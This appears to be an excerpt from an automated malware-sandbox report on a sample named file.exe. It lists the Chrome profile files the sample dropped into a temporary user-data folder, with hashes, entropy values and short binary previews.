            Encrypted:false
            SSDEEP:48:3ZlT9NEi2iFOyRZCZi2nH0C3LYHLNl3rW9FYgfn:3bVfC5YH2o0
            MD5:398E5DAED90DF80CCEC434EB3AF6BE6E
            SHA1:CBCA2102AC2AB0A7CBE4BC5D9FE0758344236AC7
            SHA-256:F8E484D1D09EB88E631CB32EA34503559B287CBC44179B6CF722AD3D6DF3BAF9
            SHA-512:329B7C204B0458EB21B39F6A02827F2B9FFE59B3094E5673BC52AB0DD93F827F6AA9DAAF12D7ECA3FCAF8B19116B8A8E696D122053AB203175DC13691E81262B
            Malicious:false
            Preview:SNSS..........H..............H..............H...... ...H..........H..........H....!.....H..................................H...H1..,......H$...125598d6_ddbf_4957_8adf_1bfbf0265dd1......H..........H.......]..........H......H....5..0......H&...{B47FAB60-AE2E-44B3-B8D1-B905DCF5A78F}.... ...H..........H....................1..,......H........chrome://newtab/....N.e.w. .T.a.b...........!.........................................................................................................C......C............................@.......................................................4.......c.h.r.o.m.e.:././.n.e.w.-.t.a.b.-.p.a.g.e./.....................................8.......0.......8....................................................................... ...............................................................................................8...............0.........C......C....p.......................................................@...............................a.b.o.u.t.:.b.l.a

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Tabs_13340965317929160

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):917
            Entropy (8bit):3.0657070649853586
            Encrypted:false
            SSDEEP:12:33hxFVtDk7pkkv/Kkn/TSGwl7dlkP3YenLc7:3xjnEx/HomzL6
            MD5:6C043880EFC9263EDA6FA105D66C7358
            SHA1:8DC81C82743FBA00CBCF3B00314108A06A642668
            SHA-256:87E28B995A8A79071EDF981240A877CBF3569C317DE69612B2E05B1D3F6FBEDE
            SHA-512:045072EF812C0D3D45B98C443F9C6250029D88C4D4DD3AA348B12CF93F3648FDD3C5625749FD1FCB7FB152D04D61A91449ECBA6EF4B65A9D890B95D78A0AF7F7
            Malicious:false
            Preview:SNSS..........H.....P...e/.u..p......H........chrome://welcome/.......W.e.l.c.o.m.e. .t.o. .C.h.r.o.m.e...........!........................................................................................................8.A.....8.A....H.......`.......`.......p.......................................................*.......c.h.r.o.m.e.:././.w.e.l.c.o.m.e./...............................................<........................o".route".landing".step".landing{..............8.......0.......8....................................................................... ...............................................chrome://welcome................P...$...0.7.e.5.0.5.1.1.-.3.6.5.b.-.4.1.b.8.-.a.8.d.1.-.d.1.f.c.3.b.6.2.a.0.e.0.................P...$...f.e.b.1.5.a.8.5.-.b.4.d.8.-.4.f.5.c.-.a.1.d.5.-.8.6.3.2.a.c.7.b.8.a.b.e.....................chrome://welcome/........4[..e/..................tY..e/..........tY..e/........

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Tabs_13340965343135326

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):917
            Entropy (8bit):3.0657070649853586
            Encrypted:false
            SSDEEP:12:33hxFVtDk7pkkv/Kkn/TSGwl7dlkP3YenLc7:3xjnEx/HomzL6
            MD5:6C043880EFC9263EDA6FA105D66C7358
            SHA1:8DC81C82743FBA00CBCF3B00314108A06A642668
            SHA-256:87E28B995A8A79071EDF981240A877CBF3569C317DE69612B2E05B1D3F6FBEDE
            SHA-512:045072EF812C0D3D45B98C443F9C6250029D88C4D4DD3AA348B12CF93F3648FDD3C5625749FD1FCB7FB152D04D61A91449ECBA6EF4B65A9D890B95D78A0AF7F7
            Malicious:false
            Preview:SNSS..........H.....P...e/.u..p......H........chrome://welcome/.......W.e.l.c.o.m.e. .t.o. .C.h.r.o.m.e...........!........................................................................................................8.A.....8.A....H.......`.......`.......p.......................................................*.......c.h.r.o.m.e.:././.w.e.l.c.o.m.e./...............................................<........................o".route".landing".step".landing{..............8.......0.......8....................................................................... ...............................................chrome://welcome................P...$...0.7.e.5.0.5.1.1.-.3.6.5.b.-.4.1.b.8.-.a.8.d.1.-.d.1.f.c.3.b.6.2.a.0.e.0.................P...$...f.e.b.1.5.a.8.5.-.b.4.d.8.-.4.f.5.c.-.a.1.d.5.-.8.6.3.2.a.c.7.b.8.a.b.e.....................chrome://welcome/........4[..e/..................tY..e/..........tY..e/........

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Shortcuts

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):0.44194574462308833
            Encrypted:false
            SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
            MD5:B35F740AA7FFEA282E525838EABFE0A6
            SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
            SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
            SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\000003.log

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):8912
            Entropy (8bit):5.915432507878918
            Encrypted:false
            SSDEEP:192:HhXhxpn+xOQwLwRRxsrEx1dxr+XwLwRRxPngVdrSJrExcxM1OA0hxMledmxdxsSg:HhXhLn+wQQaRmgPdh+XQaRBJgJ0hL+d4
            MD5:93788673DB97D1D9891F3D3252D462F0
            SHA1:B87B39B4C9983B1BCE3053A0CC9FB935DE086804
            SHA-256:EF926D00C8C7593ADDD84FAD9228F8706E29817D42BA90DB008B3C9F9EBD3F45
            SHA-512:4393C13CECA81EA78CA6FEACC4ADB55ABCA7B6A26D6B8E4893D999E7DD61D1C364B53B5C0B0C0CC6C90A1B6E13D4CC8CE373C00CDB12F79AE55118A72062705D
            Malicious:false
            Preview:...n'................_mts_schema_descriptor...9.1.z...............,web_apps-dt-fmgjjmmmlfnkbppncabfkddbjimcfncm...x.2https://mail.google.com/mail/?usp=installed_webapp..Gmail..*.https://mail.google.com/mail/J.mail/?usp=installed_webapp..Gmail".(.2.https://mail.google.com/mail/:....... .(.0.8.@.H.P.@.H.X X0X@X`X..X..X.........1..........................C...=https://mail.google.com/mail/installwebapp?usp=chrome_default...........6k..................,web_apps-dt-mpnpojknpmmopombnjdcgaaiekajbnjb......6https://docs.google.com/document/?usp=installed_webapp..Docs..*!https://docs.google.com/document/J.document/?usp=installed_webapp..Docs".(.2!https://docs.google.com/document/:....... .(.0.8.@.H.P.@.H.X X0X@X`X..X..X........1..........................G...Ahttps://docs.google.com/document/installwebapp?usp=chrome_default............X/.t...............,web_apps-dt-aghbiahbpaijignceidepookljebhfak...V. https://drive.google.com/?lfhs=2..Google Drive..*.https://drive.google.com/J.?lfhs=2..Google D

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\CURRENT

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.2743974703476995
            Encrypted:false
            SSDEEP:3:1sjgWIV//Uv:1qIFUv
            MD5:46295CAC801E5D4857D09837238A6394
            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
            Malicious:false
            Preview:MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\LOG

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):332
            Entropy (8bit):5.2370041525935225
            Encrypted:false
            SSDEEP:6:kuA0+q2PcNwi23iKKdKpIFUtjAUZmwxA0VkwOcNwi23iKKdKa/WLJ:kuAJvLZ5KkmFUtjAU/xAU54Z5KkaUJ
            MD5:DFCA1ED68504C3D2D266909306705EC8
            SHA1:3367B05F8A97B707814BF2D63B84AC6B988F1382
            SHA-256:FFF2EF110723332EA62A25339F42C10A6D6B546ED2616FB79627C0A40C84C13C
            SHA-512:E5863FD6AD9319924B15002A846279C012BA6A4BB402E86D21D68A70730D8AF8EDAFCAEF5BE95C527645C3D451EFC7811552CF3912090680FF907168ECE6D900
            Malicious:false
            Preview:2023/10/05-08:51:52.919 1d38 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2023/10/05-08:51:52.919 1d38 Recovering log #3.2023/10/05-08:51:52.919 1d38 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\LOG.old

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):332
            Entropy (8bit):5.254923385102867
            Encrypted:false
            SSDEEP:6:kusuZq2PcNwi23iKKdKpIFUtjsukZmwxsuEkwOcNwi23iKKdKa/WLJ:kuxZvLZ5KkmFUtjxk/xxE54Z5KkaUJ
            MD5:7E7A1B3F195B4CC8895D2C84F3852E31
            SHA1:7FA5E1CED9866C91D0B5B416E47996E67F1D6093
            SHA-256:8508B21913D56517810A5E0EE29BBCEECE9CAB2F625B301A8479D43162E5E5E9
            SHA-512:5415AB4AFA57A3B479D5F26DA78781023DB6B4A2707035C71AEF7F462611B4A9B2B6B238B477948085DFE05E32BE4932B086F568F8A2113FDC4451394C588161
            Malicious:false
            Preview:2023/10/05-08:51:49.478 1e50 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2023/10/05-08:51:49.478 1e50 Recovering log #3.2023/10/05-08:51:49.478 1e50 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\MANIFEST-000001

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Secret Key
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.704993772857998
            Encrypted:false
            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
            Malicious:false
            Preview:.|.."....leveldb.BytewiseComparator......

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Top Sites

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):0.37202887060507356
            Encrypted:false
            SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
            MD5:4D950F6445B3766514BA266D6B1F3325
            SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
            SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
            SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Visited Links

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.002095330713584969
            Encrypted:false
            SSDEEP:3:ImtViiPv:IiVt
            MD5:18D9C8BFC1F07DC9FD377995F0D40AED
            SHA1:6DFA525DE6C588B448A0600340AEA3BF7458E0A2
            SHA-256:172FDAC126FA79213A158CD5CCD391D813710BCF22F337146930EAE905EBCAF1
            SHA-512:71C61614A38021618099036164575D0BAC2067FB76E71F67DF2AB73824077E1F056B65F6845307A4686669BDB9B42C57A7309F171257B746977450E5A283CEA2
            Malicious:false
            Preview:VLnk.....?.......k.l...*................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
            Category:dropped
            Size (bytes):170408
            Entropy (8bit):4.700736115175864
            Encrypted:false
            SSDEEP:768:JGMkerPbmDFFwAkpeaWCSj8BbUZh5g2i4GhuPD23W1qG+WflTnKM1+Oug7S1ws17:JTTLexkpDWnIwqDYL2G1xD3hC92WdH1N
            MD5:11EB9052FA3E4755FFC9E2E718429CB5
            SHA1:6ADE41E280A7C5B3DD48228189BE3D6724BED1B4
            SHA-256:F1894DCF1859D4D0EA121BAE0C0976F368DB4ACBE30CBAF3B1836F03FA431B16
            SHA-512:E33733FCAEC08300CB004767379F0470582ECAD55D755937A2919B03FAAD5333987C74D33E1819A57311CED57AEC22242AA08EA6FCB73D350B342576982078C4
            Malicious:false
            Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ..L...M..(............. ...............................F...G6..>1..D1..B6.. ......7...l ...B...C...A...E.dN.. ....t...t...|0...H...3.q..$S../[.].1sY.5.U.3...Y..............r....P.3.Z.;.X.#}....................R./AX.7.N.*............A............R.7.G...(.`.....................<...9..Z9..Z..q.........................................(............. ...................................N..0..w3..w3..@..................l.a..>...E...A...D...:..g.5H.`.....P. .a...p%...F...G...I...8.~T..+5..M....."...#..."..9...G...9...z..p..%r.."u..D.4@J.6.M.6.E.2........................?....W.2.X.5.Y.9.f..U...a....................N.'.T.5.U.5.R.0.............................R.2vY.;.E.....|........u.....U..........@. .N...:...6............................... p..:..5:..5<i................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico.md5

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:Non-ISO extended-ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):4.0
            Encrypted:false
            SSDEEP:3:zVZum:5x
            MD5:AEC0EF4D4CEFA7D6057327E4A8CA69A3
            SHA1:1B69876DEC8A9EE8DC35842708EACF73D323266B
            SHA-256:47075E9D8C3B5977D8D52C16AC3D5170D952179E85DB30187956C8413D35F423
            SHA-512:408C3910E44E2A1CD1DADD3F637CD49DB0DE252E71621747AD999790D2D77723373237199C8D2ACA771E1926C64D0A561823C51C04EB4B05832991F4690B0505
            Malicious:false
            Preview:..............f

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
            Category:dropped
            Size (bytes):176153
            Entropy (8bit):5.269245949919283
            Encrypted:false
            SSDEEP:3072:tNjOVz1os/Icu/zejqqqqqIqqnqqvqqzFW3qvOkY6KOHiq0ZPqckQcqjc1+ahORL:tVOVzd/IUjqqqqqIqqnqqvqqzFW3qvOz
            MD5:01A9608FA54A2550EA90ED0A63888D58
            SHA1:4C3BC533FDF109625BFCCA07DF8F6CD0A4A42836
            SHA-256:168C206845754DB457AAEF9117F1FA12DC774F1B75502F0DF2FF3FBD695968C1
            SHA-512:99B14E517AEF86277141A9A9FE34DD44158DD3FEA825B66EE940F0B188F12CE83137A0BC42FCB7F8DC348A3E1BD1B50E655B2B1AC1EC22444165B6A22091C526
            Malicious:false
            Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ..b...M..(............. ......................................................... *.g"*..(..&...*...$...#..".i#,..%...%...$........&...&..."..&0..&/..!*...........*...$...#..)2..(1..#-.........."+...%...$..,5..,6..+5..(2.......)...)...$..18.h.8.)3.&1..*2..#,. *..'.h................................................................(............. .................................................................. ..!+.^.(.s.(.y.).|.%.}.$.z.!.s.#.`...."+..$/..#-.. +...$..",...)...%...%..."..$...%-..!*..,4..AI.......!...&...#..."..%/..&0.. *..5>..........7A..."...%..."..(1..(2..!+..6?..........8A...#...%..."..+4..*3..&/..09..BJ.......$...)...%...#../9..0:..,6..(2..!,..)2..$... +...)...&..5@..2:.`,7.s,4.z.6.{'2.{&..z#,.s#-.`.)............................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico.md5

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Public Key
            Category:dropped
            Size (bytes):16
            Entropy (8bit):4.0
            Encrypted:false
            SSDEEP:3:blAmn:blAmn
            MD5:467AA32B073890152C542DCF88545EB4
            SHA1:91ACA28632A8EF9B91626342FFED20C60C7AA3F5
            SHA-256:29EF0A4FBA615380CAF09AF9228D7E8A191AAA817655AB7E894C9496FE0BA4D6
            SHA-512:48A1C21AD5CE15EA88A91D3B42F2DDA867A6714CD72AFDE05BC6F7FA6BD4DACDFE4ACE62812037AFD6122A9E3455E178418BE80BBCE631D80C4788A83DFB6C57
            Malicious:false
            Preview:..m..R...u%.P

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
            Category:dropped
            Size (bytes):156005
            Entropy (8bit):3.9419007592660393
            Encrypted:false
            SSDEEP:1536:3zDNlXnPsf/d/Gn+E9rdL9rdL9rdL9rdL86tw:1+Un+E9rdL9rdL9rdL9rdL86tw
            MD5:B6222BE0D5F8AB18FA104FC1D88E3824
            SHA1:4EFF5078405F357FD2E4C866060D4115B02F7484
            SHA-256:387133071D04972F74F0722F2EA05F672E15176C2D0907B17F1804EACF886B00
            SHA-512:8BF5FA4FED13F02469F9B59CB979E5499761F8D338B48C6666F8DD4686DDECD840A467DC4EB55290535C949E8099A596513C860F9AAAD231832DC1202CE580C5
            Malicious:false
            Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ .G....M..(............. .............................T.2gZ.8.V.7.V.7.Z.8.U.2f........S.4.V.3.N...N...V.3.T.4.........N.-...t.........t.N.-.........N.-.............N.,.........N.,.............O.-.........S.4.Y.8.W.9.U.8.T.2.M.-.........S.4.[.8.T.4.O.-.6...2..$........S.2fW.7.U.6.Q./.2x.$........................................(............. .............................P.,#W.5.U.4.V.5.V.5.U.4.W.5.S.-"........U.2W[.9.Q.1.Q.0.Q.0.Q.1.[.8.R.2W........U.1TW.7.a.F.d.H.d.H.a.F.W.7.U.1T........C..Tp.T.............p.T.C..T........?..Uv.Z.............v.Z.@..T........B..Ur.U.............r.V.D..S........U.1TX.7.g.L.j.O.i.N.h.N.Z.9.R.0Z........R.1TV.7.L.-.M.-.J.+.=...A...I.$*........R.2W[.9.U.6.W.7.V.5.;...,q.4............S.-"W.5.S.4.T.5.U.3.=..6..............................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico.md5

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.875
            Encrypted:false
            SSDEEP:3:h50o1UD:h50oc
            MD5:640918E14491FFB774011C8377B4951D
            SHA1:88DBD12BD9FD9CB4A596A47CDEEF05A3AD79831D
            SHA-256:F030B7CD231680897E8188F57127350F640A0879E00124302905462E89B36F02
            SHA-512:7ED6033854E3CE3DFA7602E5EDF47ED765992E63268B8E89AA4CB4DE3D4578A1B0DF2769F9B5D19AC1692AA9EB0BD7D1A42C372EE49A61C6D409D3928A0A13B2
            Malicious:false
            Preview:.[..r....X..l...

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
            Category:dropped
            Size (bytes):163045
            Entropy (8bit):4.056629874451662
            Encrypted:false
            SSDEEP:1536:xvsclK+vGZ6PZI2NHyoMbhKw72RQKdfCh2ERZhTKyzr3WndlP9XMbo:xvUQdldMbo
            MD5:D3275657E335282C62F6C7EDA79BED0B
            SHA1:75D2A3712A7A5BD967145854B8DF767B093CCCEC
            SHA-256:9AB5DC1985DEB70DCEE5B102FA386EEEB4737DB676939E30EFDC8E0B3E3C6F77
            SHA-512:446C99997E9F39888A371CEADB0C08F35F5BA4BF79F88645B43C9164AF82967731E84C0EAC2B05DC25DA7DD2E01E4ABAADF1D69730735EB85B3A39FF6A0B7FBC
            Malicious:false
            Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ../...M..(............. ...........................................................Bi..A..jU.........@.@.R.3.V.3h..C...F..M..#:...:..3...T.8.T.3...C...4.YN.H1A..4B..6S.GW.$.T.4...;..]}..?..5D..5@..0K..3...V.*.C1...$..1@..4G.638.71L............v"$.+9...........U.........z................................................................(............. ...................................................................>!..DZ.=*....@@...@......O.1*Y.6YM..!..C...M...B.................R.3.a.<.T.3...B...J..@x....:E.\5E.\....Q.1x[.;.S.3..F...D...=~.5.}:F..7G..-3.}U.(~^.2.R.9...3..~N.OC..1D..6D..5F..7<..)}..J.I.\....Z~.4*...-..9H..1@.c4H.c::..........1.......!..,2..4G.6........=*.6............$$.+!#.t.............U.............t...*..........................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico.md5

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:Non-ISO extended-ASCII text, with no line terminators
            Category:dropped
            Size (bytes):16
            Entropy (8bit):4.0
            Encrypted:false
            SSDEEP:3:dPG9Crn:T
            MD5:DDCB0EDB4914083717623BD31267A833
            SHA1:C9E967F5F99DCEBBA98382E6B3EB10536E610D13
            SHA-256:29D0D3A34922861C320AE736377269C93EF6337DBB55B7E1540639E3BB9CC550
            SHA-512:A9F070275DABFAA8064595E893F743897E2A71220396F955E79615CBAE88D10AB98408DA76E16270598400465584EA8B12A1A7C79CDF6C79AC889B17B67EDA16
            Malicious:false
            Preview:..J.Gc,o..S....

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
            Category:dropped
            Size (bytes):154855
            Entropy (8bit):3.412003561063223
            Encrypted:false
            SSDEEP:384:SvNTEpq0LOIkXLZ54PBNiaN0BV1AjcpGW9oYpiqvPQFrpeJMBUp4CrOgvwAxWK2a:Svtcq0LrkX2sbuPFrsHZBEizq99HI
            MD5:962D04872C9B7BD685A8E238733261E1
            SHA1:D7B961CBDCC837860049985D28D8758CE6207E88
            SHA-256:1704E31D6D541BC10B2EE4BDBC66650F73848FEC97BCDB4E2E77E95278083046
            SHA-512:D163347B9D5E3008505E046152E99C01ED3BD7BD80939475720C54589404E16E42A74A8C001F955C59DB882A1914F43301384A1C554C361828D86D0251E161B5
            Malicious:false
            Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ......M..(............. ................................g...................f............................................E...e...e...E...................~...$...$...~...................k..._...^...l......................................................................$...........f...............$........................................(............. ................................#..........................."...........W...........................W...........T...........................T...........T ................... ......T...........U<...m...........m...<......T...........U,.......h...i.......,......S...........T....&...-...-...&..........Z...........T...........................*...........W.......................4..............."...................6..............................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico.md5

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):16
            Entropy (8bit):4.0
            Encrypted:false
            SSDEEP:3:wN:2
            MD5:693E24BF24763643587FC35CDF09F036
            SHA1:C8E663405C04E735EA96755D8591C3D681B02E4A
            SHA-256:F7395A68AE82EB7609BE1FCC375C6E484EDAB32220EB6403C3E58033A39F740A
            SHA-512:786CEB64A9BA03D1EB453F65C82DF73475763241EA4A2DFE5AFEEEB2F148A171088D14761F6384704A7F6C340ED80F6CDA8102D9F279C5E5CCFE69BC988083F2
            Malicious:false
            Preview:e._.".;...Yft

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
            Category:dropped
            Size (bytes):155383
            Entropy (8bit):3.7636223373910633
            Encrypted:false
            SSDEEP:768:2TIJLBiw5jT////MvDPmaWQ73TLbL73TLHLogKeTzPGEn5uPajYHNJ666au:2TI/i7nU6b
            MD5:68960FAA72FFAC468AE43B5123C54D73
            SHA1:56F660D4EB84EE9793341B6E435F172B1A142E28
            SHA-256:6B250CEA2BC861221FBB43DE55AB4F64B6AA23E442135288CA5D83334986A368
            SHA-512:88E8EE94277234FA1DB73AEE7CBB468AD1509542DBF9F79B128AFEF727E589B37B3946219C1612D64A20EA043AE73FF42BA87A55B402FF1490B03D4DD240E104
            Malicious:false
            Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ......M..(............. ...............................@g..F...D...D...E...Af..........C...G...?...A...I...A...........:...f.......k...?...C...........:...j...........e...;...........:...l...........o...;...........B...I...I..G...A..:...........A...G...B...9..g...c.$..........Af..E...D...<..c.$........................................(............. ...............................:#..D...C...C...C...C...D...<"..........@W..H...?...>...@...D...H...@W..........@T..E...T...X...S..A...F...@T..........@T..E..............A...E...@T..........?U..E...{...............E...@T..........?U..E...................E...AS..........@T..E...Y...^...]...[...G...AZ..........@T..F..;..;..}8..p!..s&..y1*..........@W..H...D...F...C..m...].4..............<"..D...C...D...A..q!6..............................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico.md5

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):16
            Entropy (8bit):4.0
            Encrypted:false
            SSDEEP:3:bIvonQf:bVQf
            MD5:1CA621DFCBB11BF882E9684890E65288
            SHA1:887383B5BF8C2E74AD19F31F9842D23E1758828C
            SHA-256:1913AFE9FA25AF894C2DE2524BA31BE1B01D93BC2E2EF166ADF7D4F0166B03FA
            SHA-512:9DC12848C6840ACF8EEE4406BA069D1FD4CC0314415B9BE1F94781445386CCF7B11FB92482E976E39272152A3B373E5D01952A8D93F24E1BCF0923D869538BA2
            Malicious:false
            Preview:.U6.,....|20'B..

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Data

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.137181696973627
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
            MD5:2D903A087A0C793BDB82F6426B1E8EFB
            SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
            SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
